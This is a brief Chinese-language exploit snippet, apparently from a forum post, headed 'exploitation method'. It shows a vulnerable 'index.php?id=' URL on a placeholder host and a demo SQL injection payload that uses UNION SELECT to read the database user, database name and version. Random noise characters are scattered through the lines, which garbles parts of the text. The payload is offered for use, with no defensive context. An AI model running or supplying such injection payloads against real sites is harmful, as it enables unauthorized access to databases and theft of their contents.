利用方法:1 C- P- l8 A+ A9 i' u3 F0 V& [
http://www.xxx.com/index.php?id=[SQL]
U" g7 ^; O3 [: R Demo:
- J I. c. A* G2 N& j http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |